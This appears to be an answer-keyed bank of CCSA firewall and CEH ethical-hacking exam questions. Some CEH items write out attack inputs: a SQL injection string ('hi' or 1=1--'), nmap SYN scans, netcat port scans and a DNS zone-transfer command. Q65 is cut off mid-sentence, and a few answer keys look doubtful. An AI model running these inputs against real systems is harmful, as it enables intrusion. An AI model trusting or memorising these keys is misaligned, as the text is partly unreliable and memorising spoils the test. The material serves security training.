E 	#CCSA Q51.  Stateful inspection is a firewall technology introduced in Checkpoint VPN1 software. It is designed to meet which of the following security requirements? ^  1. Scan information from all layers in the packet. ^  2. Save state information derived from previous communications, such as the outgoing Port command of an FTP session, so that incoming data communication can be verified against it. ^  3. Allow state information derived from other applications access through the firewall for authorized services only, such as previously authenticated users. ^  4. Evaluate and manipulate flexible expressions based on communication and application derived state information. ^A.  1, 2, 3   ^B.  1, 3, 4    ^C.  1, 2, 4   ^D.  2, 3, 4    ^E.  1, 2, 3, 4 
A 	#CCSA Q52. If the security policy editor or system status GUI is open, you can open the log viewer GUI from the window menu. ^A.  True ^B.  False 
D 	#CCSA Q53. NAT can NOT be configured on which of the objects? ^A.  Hosts ^B.  Gateways ^C.  Networks ^D.  Users ^E.  Routers 
C 	#CCSA Q54. Your customer has created a rule so that every user wants to go to Internet, that user must be authenticated. ^  Which is the best method of authentication for users who must use specific computers for Internet access? ^A.  Session ^B.  User ^C.  Client ^D.  Connection ^E.  None of the above. 
B 	#CCSA Q55. Which of the following describes the behavior of VPN1 NG? ^A.  Traffic not expressly prohibited is permitted. ^B.  Traffic not expressly permitted is prohibited. ^C.  TELNET, SMTP and HTTP are allowed by default. ^D.  Secure connections are authorized by default, unsecured connections are not. ^E.  All traffic is controlled by explicit rules. 
E 	#CCSA Q56. New users are created from templates. What is the name of the standard template from which you would create a new user? ^A.  New ^B.  User ^C.  Group ^D.  Standard User. ^E.  Default 
B 	#CCSA Q57. In a distributed management environment, the firewall administrator has removed the default check from Accept VPN1 control connections under the Security Policy tab of the properties setup dialogue box. ^  In order for the management module and the Firewall to communicate, you must create a rule to allow the Management Module to communicate to the firewall on which port? ^A.  80 ^B.  256 ^C.  259 ^D.  900 ^E.  23 
B 	#CCSA Q58. What is the command for installing a Security Policy from a *.W file? ^A.  Fw gen and then the name of the .W file. ^B.  Fw load and then the name of .W file. ^C.  Fw regen and then the name of the .W file. ^D.  Fw reload and then the directory location of the .W file. ^E.  Fw import and then the name of the .W file. 
B 	#CCSA Q59. In the Check Point Configuration Too, you create a GUI administrator with Read Only privileges.   ^  This allows the Firewall-1 administrator for the authorized GUI client (GUI workstation) privileges to change network object, and create and install rules. ^A.  True ^B.  False 
D 	#CCSA Q60. Hybrid Authentication allows VPN1 NG to authenticate SecuRemote/SecureClient, using which of the following? ^A.  RADIUS ^B.  3DES ^C.  TACACS ^D.  Any authentication method supported by VPN1. ^E.  Both A and C. 
E 	#CCSA Q61. In order to install a new Security Policy on a remote firewall, what command must be issued on the remote firewall? ^A.  Fw unload all all. ^B.  Fw load new. ^C.  Cp clear policy. ^D.  None of the above, the command cp policy remove is issued from the manager.     ^E.  None of the above, the new policy will automatically overwrite the existing policy. 
A 	#CCSA Q62. As a firewall administrator if you want to log packets dropped by ""implicit drop anything not covered"" rules, you must explicitly define a Clean-up rule. This must be the last rule in the rule base. ^A.  True ^B.  False
A 	#CCSA Q63.  Fully Automatic Client authentication provides authentication for all protocols, whether supported by these protocols or not. ^A.  True ^B.  False 
B 	#CCSA Q64. VPN1 NG differs from Packet filtering and Application Layer Gateways, because? ^A.  VPN1 NG provides only minimal logging and altering mechanism. ^B.  VPN1 NG uses Stateful inspection which allows packet to be examined at the top of the layers of the OSI model. ^C.  VPN1 NG has access to a limited part of the packet header only. ^D.  VPN1NG requires a connection from a client to a firewall and firewall to a server. ^E.  VPN1 NG has access to packets passing through key locations in a network. 
A 	#CCSA Q65. AlphaBravo Corp has 72 privately addressed internal addresses. Each network is a piece of the 10-net subnetted to a class C address. ^   AlphaBravo uses Dynamic NAT and hides all of the internal networks behind the external IP addresses of the Fire
C 	#CCSA Q66. How does VPN1 NG implement Transparent authentication? ^A.  Unknown user receive error messages indicating that the firewalled gateway does not know the user names on the gateway. ^B.  VPN1 NG prompts for user names even through the authentication data may not be recognized by the firewall's user database. ^C.  VPN1 NG allows connections, but hides the firewall from authenticated users. ^D.  Unknown users error messages indicating that the host does not know the users names on the server. ^E.  VPN1 NG does not allow connections from users who do not know the name of the firewall. 
B 	#CCSA Q67. When creating user authentication rule, select intersect with user database for source and destination to allow access according to the source specified in the rules. ^A.  True ^B.  False 
C 	#CCSA Q69. Which if the following statements about Client Authentication are FALSE? ^A. In contrast to User Authentication, which allows access per user, Client Authentication allows access per ID address. ^B. Authentication is by user name and password, but is the host machine (client) that is granted access. ^C. Client Authentication is more secure than User Authentication, because it allows multiple users and connections from an authorized IP address or host. ^D. Client Authentication enables administration to grant access privileges to a specific IP address after successful authentication. 
B 	#CCSA Q70. When you make a rule, the rule is not enforces as part of your Security Policy. ^A.  True ^B.  False 
E 	#CCSA Q71. Which of the following user actions would you insert as an INTERNAL Authentication scheme? ^A.  The user enters the security dynamics passcode. ^B.  The user prompted for a response from the RADIUS server. ^C.  The user prompted for a response from the AXENT server.  ^D.  The user prompted for a response from the TACACS server. ^E.  The user enters an operating system account password. 
A 	#CCSA Q72. When configuring Static NAT, you cannot map the routable IP address to the external IP address of  the Firewall if attempted, the security policy installation fails with the following error ""rule X conflicts with rule Y"". ^A.  True ^B.  False
B 	#CCSA Q73. The advantage of client authentication is that it can be used for any number of connections and for any services, but authentication is only valid for a specified length of time. ^A.  True ^B.  False 
A 	#CCSA Q74. You have set up Static NAT on a VPN1 to allow Internet traffic to an internal web server. ^  You notice that any HTTP attempts to that machine being dropped in the log due to rule 0. ^  Which of the following is the most likely cause? ^A.  Spoofing on the internal interface us set to Network defined by Interface IP and Net Mask. ^B.  Spoofing on the external interface is set to Not Defined. ^C.  You do NOT have a rule that allows HTTP access to the internal Web Server. ^D.  You do NOT have a rule that allows HTTP from the Web Server to Any destination. ^E.  None of the above. 
C 	#CCSA Q75. As a firewall administrator, you are required to create VPN1 users for authentication. ^  When you create a user for user authentication, the data is stored in the? ^A.  Inspect Engine.   ^B.  Rule base. ^C.  Users database    ^D.  Rulebase fws file ^E.  Inspect module. 
A 	#CCSA Q76. If users authenticated successfully, they have matched the User and Authentication rule restriction of the user group to which they belong. ^A.  True ^B.  False 
B 	#CCSA Q77. The only way to unblock BLOCKED connections by deleting all the blocking rules from the Rule base. ^A.  True ^B.  False 
B 	#CCSA Q78. When you perform a cp fetch, what can you expect from this command? ^A.  Firewall retrieves the user database from the tables on the Management Module. ^B.  Firewall retrieves the inspection code from the remote Management Module and installs it to the kernel. ^C.  Management module retrieves the IP address of the target specified in the command. ^D.  Management module retrieves the interface information for the target specified in the command. ^E.  None of the above. 
B 	#CCSA Q79. Each incoming UDP packet is locked up in the list of pending connections. Packets are delivered if they are _________. ^A.  A request. ^B.  A response to a request.     ^C.  Source routed. ^D.  Allowed by the Rule Base. ^E.  Both B and D 
E 	#CCSA Q80. Assume an NT system. What is the default expiration for a Dynamic NAT connection NOT  showing any TCP activity? ^A.  30 Seconds.   ^B.  60 Seconds.    ^C.  330 Seconds. ^D.  660 Seconds.  ^E.  3600 Seconds. 
B 	#CCSA Q81. When you disable a rule the rule is NOT disabled until you verify your Security Policy. ^A.  True ^B.  False 
B 	#CCSA Q82. Static Source NAT translates public internal source IP addresses to private external source IP addresses. ^A.  True ^B.  False
B 	#CCSA Q83. What is the command that lists the interfaces to which VPN1 bound? ^A.  Fw ct1 iflist ^B.  Ifconfig -a  ^C.  Ifconfig \all ^D.  Netstat -m ^E.  Cp bind -all 
B 	#CCSA Q84. Your customer has created a rule so that every time a user wants to go to Internet, that user must be authenticated. ^   Which if the following is the best authentication method for roaming users, such as doctors updating patient records at various floor stations in a hospital? ^A.  Session ^B.  User ^C.  Client ^D.  Connection ^E.  None of the above. 
C 	#CCSA Q85. Which command utility allows verification of the Security Policy installed on a firewall module? ^A.  Fw ct1 pstat. ^B.  Fw printlic.  ^C.  Fw stat. ^D.  Fw ver. ^E.  Fw pol. 
E 	#CCSA Q86. You are a firewall administrator with one Management Server managing 3 different Enforcement Modules. ^  One of the Enforcement Modules does NOT show up in the dialog box when attempting to install a Security Policy. Which of the following is the most likely cause? ^A.  No master file was created. ^B.  License for multiple firewalls has expired. ^C.  The firewall has NOT been rebooted. ^D.  The firewall was NOT listed in the Install On column of the rule. ^E.  The firewall is listed as ""Managed by another Management Module (external)"" in the Workstation Properties dialog box. "
B 	#CCSA Q87. In the Install On column of a rule, when you select a specific firewall object as the only configuration object, that rule is enforced on all firewalls with in the network, with related configurations. ^A.  True ^B.  False
E 	#CCSA Q88. As an administrator, you want to force your users to authenticate. You have selected Client Authentication as your authentication scheme. ^  Users will be using a Web browser to authenticate. On which TCP port will authentication be performed? ^A.  23  ^B.  80  ^C.  259 ^D.  261 ^E.  900 
A 	#CCSA Q90. Client Authentication rules should be placed above the Stealth rule, so users can authenticate to the firewall. ^A.  True ^B.  False 
B 	#CCSA Q91. The following rule base tells you any automatically created NAT rules have simply hidden but have not been deleted from the Rule Base. ^A.  True ^B.  False 
B 	#CCSA Q92. You are using static Destination NAT. You have VPN1 NG running on Windows NT/Solaris platform. ^  By default, routing occurs after the address translation when the packet is passing form the client towards the server. ^A.  True ^B.  False 
D 	#CCSA Q93. Which if the following statements is FALSE? ^A.  Dynamic NAT cannot be used for protocols where the port number cannot be changed. ^B.  Dynamic NAT cannot be used when an external server must distinguish between clients bases on their IP addresses. ^C.  With Dynamic NAT, packet's source port numbers are modified. ^D.  In Dynamic NAT, public internal addresses are hidden behind a single private external address using dynamically assigned port numbers to distinguish between them. ^E.  Dynamically assigned post numbers are used to distinguish between hidden private addresses. 
B 	#CCSA Q94.  When you modify a User Template, any users already operating under that template will be updates to the new template properties. ^A.  True ^B.  False 
A 	#CCSA Q95.  Installation time for creating network objects will decrease if you list machine names and IP addresses in the hosts files. ^A.  True ^B.  False 
C#CEH Q.1 If your concern is hackers coming across the firewall and using SMB session hijacking, ^  you can block that by not allowing UDP ports __________ as well as TCP ports _________ from coming through the firewall. ^  (Select the Best Answer)^A.	167, 345 and 123 and 137^B.	80, 21 and 23, 110^C.	137, 138 and 139, 445^D.	1277, 1270 and 80, 21
D#CEH Q.2 Microsoft has maintained backward compatibility with its older dialects. This backward compatibility means that when a SMB session is initiated, a more primitive plain text level of authentication can often be negotiated that provides for maximum exposure of the password data. ^  Because SMB was developed to facilitate file and print sharing on local networks, a Windows client will automatically attempt to log onto an SMB server. ^  In the process, the host and client will exchange password hashes. ^  These pairs of password hashes, the challenge from the host plus the response from the client, can be sniffed and saved for later cracking by using which of the following hacking tool? (Select the Best Answer)^A.	SMBRelay^B.	ObiWan^C.	Hunt^D.	L0phtcrack^E.	NBTCracker
C#CEH Q.3 How do you prevent SMB Hijacking in Windows operating systems? (Select the Best Answer)^A.	Install WINS Server and configure secure authentication.^B.	Disable NetBIOS over TCP/IP in Windows NT and 2000.^C.	The only effective way to block SMB hijacking is to use SMB signing.^D.	Configure 128-bit SMB credentials key-pair in TCP/IP properties.
B#CEH Q.4 This tool is a free network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. ^  You can interactively browse the capture data, viewing summary and detail information for each packet. ^  This tool has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. (Select the Best Answer)^A.	Port Scan plus^B.	Ethereal^C.	Sam Spade^D.	Lp0Crack
D#CEH Q.5 What is a packet sniffer? (Select the Best Answer)^A.	A packet sniffer is a keyboard logger that plugs into computer networks and captures passwords.^B.	A packet sniffer is a packet blocker firewall that plugs into computer networks and generates packets.^C.	A packet sniffer is a Intrusion Detection System that monitors real time hacking events.^D.	A packet sniffer is a wire-tap devices that plugs into computer networks and eavesdrops on the network traffic.
ALL#CEH Q.6 What protocols are vulnerable to sniffing? (Select all that apply)^A.	Telnet and rlogin^B.	HTTP^C.	SNMP^D.	NNTP^E.	POP^F.	FTP^G.	IMAP
A#CEH Q.8 If you want to get a list of all the ip addresses as well as aliases assigned within a domain, you can grab that information if the DNS server allows zone transfers. ^  The zone transfer is the method a secondary DNS server uses to update its information from the primary DNS server. DNS servers within a domain are organized using a master-slave method where the slaves get updated DNS information from the master DNS. ^  Which nslookup command that dump all available records, assuming zone transfers are enabled? (Select the Best Answer)^A.	>set type=any > ls -d eccouncil.org >ns.eccouncil.org >exit^B.	< list=any < lc -x eccouncil.org< dns.eccouncil.org< exit^C.	< set type=any < dir -c eccouncil.org< dns.eccouncil.org< exit^D.	< set type=any < list report eccouncil.org< dns.eccouncil.org< exit^E.	< set type=any < dns -ls eccouncil.org< dns.eccouncil.org< exit
B#CEH Q.9 Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. ^  Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. ^  How do you prevent DNS spoofing? (Select the Best Answer)^A.	Disable DNS Mail Relay.^B.	Disable DNS Zone Transfer.^C.	Install DNS logger and track vulnerable packets.^D.	Install DNS Anti-spoofer
A#CEH Q.10 Douglas Brown discovered a new worm that targets Microsoft SQL Server installations where the SQL Administrator password is blank (note that this is the default configuration for SQL Server 2000 and earlier). ^  The worm logs in using the Administrator account, then calls a command shell to FTP and install a Trojan. The Trojan communicates with the attacker via IRC, where the attacker is able to utilize the infected systems to launch Distributed Denial of Service (DDoS) attacks. ^  You would like to port scan all the SQL Servers that are vulnerable to this attack in your organization. Which port number you will scan for? (Select the Best Answer)^A.	1433^B.	1432^C.	1434^D.	1435
B#CEH Q.11 This hacking tool runs as a Windows OS stack and hides itself from netstat command. Any directory or file that starts with '_root_' will be hidden. Any process that starts with '_root_' will be hidden. (Select the Best Answer)^A.	WINOS Trojan^B.	NT Rootkit^C.	NubUs^D.	Back Orrifice
B#CEH Q.12 This Linux program is a daemon intended to catch someone installing a rootkit or running a packet sniffer. ^  It is designed to run continually with a small footprint under an innocuous name. ^  When triggered, it sends email, appends to a logfile, and disables networking or halts the system. It is designed to install with the minimum of disruption to a normal multiuser system, and should not require rebuilding with each kernel change or system upgrade. (Select the Best Answer)^A.	cheops^B.	chkrootkit^C.	desps^D.	qswatcher
D#CEH Q.13 What does the tool MP3Stego do? (Select the Best Answer)^A.	MP3Stego adds watermark to music data in MP3 files during the compression process.^B.	MP3Stego encrypts music in MP3 files during the compression process.^C.	MP3Stego adds images in MP3 files during the compression process.^D.	MP3Stego hides information in MP3 files during the compression process.
B#CEH Q.14 This hacking tool when placed over a web page reveals password displayed as "*****". (Select the Best Answer)^A.	NAT^B.	SnadBoy^C.	Password Revealer^D.	MugBoy
A#CEH Q.15 How long will it take to crack a password using straight dictionary attack (3 million words) on a single 1.5 GHz Intel Pentium machine? (Select the Best Answer)^A.	2.5 mins^B.	13.6 days^C.	4.2 hours^D.	4.6 days
C#CEH Q.16 This tool is a remote scanner for the most common Distributed Denial of Service programs. These were the programs responsible for the recent rash of attacks on high profile web sites such as Yahoo, Amazon, eBay. ^  This tool will detect Trinoo, Stacheldraht and Tribe Flood Network programs running with their default settings. (Select the Best Answer)^A.	DDoScanner^B.	DoSMinger^C.	DDoSPing^D.	DDoSKiller
B#CEH Q.17 This tool from GFI is a freeware security scanner to audit your network security. It scans entire networks and provides NETBIOS information for each computer such as hostname, shares, logged on user name. ^  It does OS detection, tests password strength, detects registry issues. Reports are outputted in HTML. ^  This tool checks the network for all potential methods that a hacker might use to attack a network. ^  By analyzing the operating system and the applications running on your network, it identifies possible security holes in the network. In other words, it plays the devil's advocate and alerts weaknesses before a hacker can find them, enabling the administrator to deal with these issues before a hacker can exploit them.(Select the Best Answer)^A.	SAN Secure Scanner^B.	LANGuard Network Scanner^C.	GFI Guard^D.	Sentinel Scanner
B#CEH Q.18 The tool MingSweeper. What is it used for? (Select the Best Answer)^A.	MingSweeper is a session hijacking tool.^B.	MingSweeper is a network reconnaissance tool.^C.	MingSweeper is an ARP poisoning tool.^D.	MingSweeper is a port scanner.
A#CEH Q.19 What does the hacking tool NetCat do? (Select the Best Answer)^A.	NetCat is called the TCP/IP swiss army knife It is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol.^B.	NetCat is a powerful tool for network monitoring and data acquisition This program allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression.^C.	NetCat is a flexible packet sniffer/logger that detects attacks. NetCat is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system.^D.	NetCat is a security assesment tool based on SATAN (Security Administrator's Integrated Network Tool).
C#CEH Q.20 What is Whisker? (Select the Best Answer)^A.	Whisker is a Trojan virus.^B.	Whisker is an application scanner.^C.	Whisker is a CGI vulnerability scanner^D.	Whisker is a SNMP dumping tool.
D#CEH Q.21 This tool is a file and directory integrity checker. It aids system administrators and users in monitoring a designated set of files for any changes. Used with system files on a regular (e.g., daily) basis, ^  it can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner. (Select the Best Answer)^A.	Hping2^B.	DSniff^C.	Cybercop Scanner^D.	Tripwire
C#CEH Q.22 This is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies. ^  It handles fragmentation and arbitrary packet body and size, and can be used to transfer files under supported protocols. ^  Using this tool, you can: test firewall rules, perform [spoofed] port scanning, test net performance using different protocols, packet size, TOS (type of service), and fragmentation, do path MTU discovery, tranfer files (even between really Fascist firewall rules), perform traceroute-like actions under different protocols, fingerprint remote OSs, audit a TCP/IP stack, etc. (Select the Best Answer)^A.	Nemesis^B.	Lids^C.	Hping2^D.	Cybercop Scanner
B#CEH Q.23 WinTrinoo is an example of: (Select the Best Answer)^A.	Firewall^B.	DDoS Attack tool^C.	Virus Scanner^D.	Trojan Program
B#CEH Q.24 Which of the following Nmap command launches a stealth SYN scan against each machine that is up out of the 255 machines on class C where target.example.com resides and tries to determine what operating system is running on each host that is up and running? (Select the Best Answer)^A.	nmap -v target.example.com^B.	nmap -sS -O target.example.com/24^C.	nmap -sX -p 22,53,110,143,4564 198.116.*.1-127^D.	nmap -XS -O target.example.com
A#CEH Q.26 Snort is a Linux based Intrusion Detection System. Which command enables Snort into network intrusion detection (NIDS) mode assuming snort.conf is the name of your rules file and the IP address is: 192.168.1.0 with Subnet Mask:255.255.255.0? (Select the Best Answer)^A.	./snort -c snort.conf 192.168.1.0/24^B.	./snort 192.168.1.0/24 -x snort.conf^C.	./snort -dev -l ./log -a 192.168.1.0/8 -c snort.conf^D.	./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf
C#CEH Q.27 Many web based authentication models revolve around solely trusting cookies for verification of a user's session. If a malicious person can obtain a user's cookies for a service, then he can use those cookies to access the victim's account. ^  Pages that can use a server's cookies are limited to that particular server, or higher-level domain servers (like hotmail.passport.com for '.passport.com' cookies). ^  In order for a malicious person to obtain a victim's cookies for a site, he must manufacture a fake javascript that must execute within a page from that same domain. ^  This is done by manipulating the error messages that are returned, either from 404 requests or form elements that are echoed back to the screen unescaped. For example, by sending a web-mail user an email with a link to the very same server, the link looks harmless, and it can trick the user into clicking on the link, thus running the embedded javascript and sending his cookies to the malicious person. How do you prevent thiype of cookie hijacking? (Select the Best Answer)^A.	Escaping all form data that is echoed to the screen and not echoing 404 file requests eliminates this problem.^B.	Setting up some secondary authentication requirement other than cookie information would at least make this session-stealing problem a lesser threat.^C.	Enabling SSL on all the authentication pages will solve the problem.^D.	Implement 128-bit cookie security on all your sessions with the client browser.
A#CEH Q.28 Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow. A vulnerability in the ASP (Active Server Pages) ISAPI filter, loaded by default on all NT4 and Windows 2000 server systems (running IIS), can be exploited to remotely execute code of an attackers choice. ^  The fault lies within the decoding and interpretation of form data received by malicious clients. ^  By chunk encoding form data we can force IIS to overwrite 4 bytes of arbitrary memory with data we supply. This is a very serious vulnerability and Microsoft suggests that administrators install the supplied patch as soon as possible. ^  What is the patch number, which fixes this bug in IIS? (Select the Best Answer)^A.	Microsoft Security Bulletin MS02-018^B.	Microsoft Security Bulletin MS02-456^C.	Microsoft Security Bulletin MS02-056^D.	Microsoft Security Bulletin MS02-234
E#CEH Q.29 tini is a simple and very small (3kb) trojan backdoor for Windows, coded in assembler. It listens at TCP port and connects via remote Command Prompt. What port number does it listen on by default? (Select the Best Answer)^A.	3333^B.	4444^C.	5555^D.	6666^E.	7777
C#CEH Q.30 Which of the following program is capable of detecting and removing more than 1000 Trojan Horses from your system? (Select the Best Answer)^A.	NuBuS^B.	SubSeven^C.	Tauscan^D.	BO^E.	Tini^F.	TrojanKiller
D#CEH Q.31 What is Zombie Zapper? (Select the Best Answer)^A.	Zombie Zapper is a DDoS tool that installs on a victim's machine as "zombie".^B.	Zombie Zapper is a firewall, which works on Linux and Solaris OS.^C.	Zombie Zapper is a trojan that listens on port 2345.^D.	Zombie Zapper is a free, open source tool that can tell a zombie system flooding packets to stop flooding.
B,C#CEH Q.32 Which of the following are examples of Distributed Denial of Service (DDoS) attack tools? (Select all that apply)^A.	WinTrinoo^B.	TFN2K^C.	Stacheldraht^D.	Knight^E.	Kayton^F.	GTBot
B#CEH Q.33 Netcat is a simple network utility which reads and writes data across network connections, using TCP or UDP protocol. Which of the following command scans for open ports between [1 - 140]? (Select the Best Answer)^A.	nc -xx -q -w2 my-attacker-IP-address [1-140]^B.	nc -vv -z -w2 my-attacker-IP-address 1-140^C.	nc my-attacker-IP-address (1,140)^D.	nc 140 my-attacker-IP-address -vv
B#CEH Q.34 This network tool is a comprehensive packet analyzer for IEEE 802.11 wireless LANs, supporting all higher level network protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. ^  This tool isolates security problems, fully decodes 802.11a and 802.11b WLAN protocols, and analyzes wireless network performance with accurate identification of signal strength, channel and data rates. (Select the Best Answer)^A.	AeroSeek^B.	AiroPeek^C.	AirMan^D.	AirCell^E.	AirWire
D#CEH Q.35 Which of the following is a wireless LAN (WLAN) tool which recovers encryption keys. (Select the Best Answer)^A.	AirPeek^B.	AirMan^C.	Airport^D.	AirSnort
D#CEH Q.36 "Anonymous web surfing" is a proxy server, which downloads the webpage you requested and then displays the web page to you through an encrypted URL. ^  Since your computer doesn't make a connection to the server, it brings it to you totally anonymous, and they have no idea you were there, and information about you and your computer isn't gathered by that website. ^  All you do is type in the web site you want to visit and you will be taken there promptly and securely. Which of the following web site provides free anonymous web surfing services? (Select the Best Answer)^A.	http://www.anoyume.com^B.	http://www.privacybusters.com^C.	http://www.badboys.com^D.	http://www.silenter.com
B#CEH Q.37 Which hacking tool exploits Microsoft Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability?(Select the Best Answer)^A.	IIS Lockdown^B.	Jill-32^C.	IPP Scanner^D.	IPP Exploit^E.	URLScan
C#CEH Q.38 Which of the following is a ramdisk-based Linux distribution that boots from a single floppy and loads it packages from an HTTP/FTP server? (Select the Best Answer)^A.	Red Hat Linux^B.	Turbo Linux^C.	Trinux^D.	Flopix^E.	Raminux
A#CEH Q.39 SQL injection is usually caused by developers who use "string-building" techniques in order to execute SQL code. For example, in a search page, the developer may use the following code to execute a query:	^  Set myRecordset = myConnection.execute("SELECT * FROM myTable WHERE someText ='" & request.form("inputdata") & "'") ^  Which of the following prevents SQL injection on a web page? (Select the Best Answer)^A.	For string data, replace single quotes with two single quotes using the replace function or equivalent : goodString = replace(inputString,','')^B.	For string data, replace double quotes with two single quotes using the replace function or equivalent: goodString = replace(inputString,'','')^C.	For string data, replace single quotes with asterix using the replace function or equivalent: goodString = replace(inputString,',*)^D.	For string data, replace single quotes with two underscore characters using the replace function or equivalent: goodString = replace(inputString,',__)
D#CEH Q.40 How do you test SQL injection vulnerability on a Web page? (Select the Best Answer)^A.	Input "asterix character" something like:^  hi* or 1=1-- ^  Into login, or password, or in the URL. Example:^  Login: hi* or 1=1--^  Pass: hi* or 1=1--^  http://duck/index.asp?id=hi* or 1=1- ^B.	Input "underscore character" something like:^  hi__ or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi__ or 1=1--^  Pass: hi__ or 1=1--^  http://duck/index.asp?id=hi__ or 1=1--^C.	Input "double quote" something like:^  hi'' or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi'' or 1=1--^  Pass: hi'' or 1=1--^  http://duck/index.asp?id=hi'' or 1=1--^D.	Input "single quote" something like:^  hi' or 1=1--^  Into login, or password, or in the URL. Example:^  Login: hi' or 1=1--^  Pass: hi' or 1=1--^  http://duck/index.asp?id=hi' or 1=1--
A#CEH Q.41 Which of the following is a dictionary attack tool for Microsoft SQL Server, which lets you test if the login accounts are strong enough to resist an attack? (Select the Best Answer)^A.	SQLdict^B.	SQLAttack^C.	SQLWalker^D.	C-Q-L-HACK
B#CEH Q.42 Which of the following is a hacking tool that has the ability to hijack TCP sessions? For example, you can capture the contents of a Telnet session and spy on what a person is doing, or hijack the session and start typing in your own commands. (Select the Best Answer)^A.	JungleBungle^B.	Juggernaut^C.	SesHijack^D.	TCP Kidnapper
A#CEH Q.43 Smurf attacks are the easiest distributed DOS attack to commit. ^  In its simplest form, the attacker begins by using a commonly available program to scan the Internet to locate routers that that allow entry to broadcast pings. ^  When he or she locates this kind of router, then next step is to forge ping packets with the origination address of the intended victim. This is done using packet manipulation tools. ^  This type of attack can also use other Internet Control Message Protocol (ICMP) techniques. ^  To avoid arrest, the attacker will typically use a hacked computer to send out these forged ping packets. ^  These packets are then sent to the network behind the vulnerable router. ^  Each computer on this network echoes each attacking ping out to the victim designated in the ping's forged header. ^  So if there are two hundred computers on this intermediary network, for every single ping of the attacking computer, they will send 200 pings out to the victim. ^ How do you defend against these typeof Smurf attack?(Select the BeSt Answer)^A.	deny broadcast pings at the intermediary network's border router.^B.	deny ICMP at the intermediary network's border router.^C.	deny smurf 34.6 type frames at the firewall.^D.	enable broadcast pings at the intermediary network's border router.
D#CEH Q.44 Which tool detects the presence of Trinoo, TFN, or Stacheldraht clients on your machine? (Select the Best Answer)^A.	DDoS Detector^B.	TrinooBuster^C.	TFNKiller^D.	RID
C#CEH Q.45 Trinoo is a dangerous distributed tool used to launch coordinated UDP flood denial of service attacks from many sources. A trin00 network consists of a small number of servers, or masters, and a large number of clients, or daemons. ^  The denial of service attack utilizing a trin00 network is carried out by an intruder connecting to a trin00 master and instructing that master to launch a denial of service attack against one or more IP addresses. The trin00 master then communicates with the daemons giving instructions to attack one or more IP addresses for a specified period of time. What default port does the master sends UDP broadcast packets to the daemon? (Select the Best Answer)^A.	27445^B.	27447^C.	27444^D.	27449
C#CEH Q.46 Buffer overflow attacks exploit a lack of bounds checking on the size of input being stored in a buffer array. ^  By writing data past the end of an allocated array, the attacker can make arbitrary changes to program state stored adjacent to the array. How do you protect your system from buffer overflow exploits? (Select the Best Answer)^A.	Install a firewall system which protects from buffer overflow exploits.^B.	Install an IDS system which protects from buffer overflow exploits.^C.	Proper OS Patch maintenance is the best way to protect your systems from the buffer overflow attack.^D.	Proper virus pattern maintenance is the best way to protect your systems from the buffer overflow attack.
D#CEH Q.47 First appearing on September 18, 2001, Nimda is a computer virus that caused traffic slowdowns as it rippled across the Internet, spreading through four different methods, infecting computers containing Microsoft's Web server, Internet Information Server (IIS), and computer users who opened an e-mail attachment. ^  Like a number of predecessor viruses, Nimda's payload appears to be the traffic slowdown itself - that is, it does not appear to destroy files or cause harm other than the considerable time that may be lost to the slowing or loss of traffic known as denial-of-service and the restoring of infected systems. With its multi-pronged attack, Nimda appears to be the most troublesome virus of its type that has yet appeared. Nimda virus refers to a file, when run, continues to propagate the virus. What is the name of this file? (Select the Best Answer)^A.	cmd.exe^B.	patch.exe^C.	explorer.dll^D.	admin.dll
B#CEH Q.48 What buffer overflow vulnerability does Nimda virus exploit to gains access to IIS servers? (Select the Best Answer)^A.	Internet Printing Protocol (IPP)^B.	ISAPI DLL^C.	Windows 2000 KRNLOS.EXE^D.	IIS SMTP Services
A#CEH Q.50 This is a Novell Netware hacking tool which simulates a Novell file server. The serverwill be visible for about 1 to 2 minutes. ^  On some systems the server willbe visible for as long as the program is running. (Select the Best Answer)^A.	Novelffs^B.	Novell Faker^C.	Noveknell^D.	Novell Detector
C#CEH Q.51 Digging into the rubbish bin to find pieces of information is an example of what attack (Select the Best Answer)^A.	Spoofing^B.	Social Engineering^C.	Dumpster Diving^D.	Information gathering
B,C#CEH Q.52 In a man-in-the-middle (MiTM)attack of a SSL connection sniffing, which of the following are true?^          Session Key A                     Session Key B^  Server -------------- middle man --------------- Client^  (Select all that apply)^A.	Session Key A is sent by middle man and encrypted by client public key^B.	Session Key B is sent by client and encrypted by middle man public key^C.	Session Key A is sent by middle man and encrypted by server public key^D.	Session Key B is sent by client and encrypted by client public key^E.	Session Key A is sent by middle man and encrypted by client private key^F.	Session Key B is sent by client and encrypted by server private key
D#CEH Q.53 Which of the following network connection is or are encrypted and cannot be sniffed by an attacker on the network? (Select the Best Answer)^A.	Telnet^B.	POP3^C.	NFS^D.	SSH^E.	SMTP
B#CEH Q.54 In the Linux BIND NXT bug remote root exploit attack, the hacker inserts the shell code in which of the following connection? (Select the Best Answer)^A.	UDP on victim port 53^B.	TCP on victim port 53^C.	UDP on victim port above 1024^D.	TCP on victim port above 1024
D#CEH Q.55 An attacker on a Linux system may be able to recover a removed file from a disk using which of the following technique? (Select the Best Answer)^A.	if he knows the name of the removed file^B.	if he knows the date the file was removed^C.	if he knows the size of the file that was removed^D.	if he knows the inode value of the removed file
C#CEH Q.56 This is a firewall filter rules configured on a Linux system:^  # set the default to deny all incoming network traffic^  /sbin/ipchains -P input DENY^  # Allow incoming TCP traffic^  /sbin/ipchains -A input -i eth0 -p tcp ! -y -s any/0 -j ACCEPT^  An attacker sends a huge packet targeted towards the Linux system. Which of the following does the firewall will not block from an attack? (Select all that apply)^A.	TCP connection scan^B.	Half connect()^C.	FIN scan^D.	Xmas scan^E.	Null scan
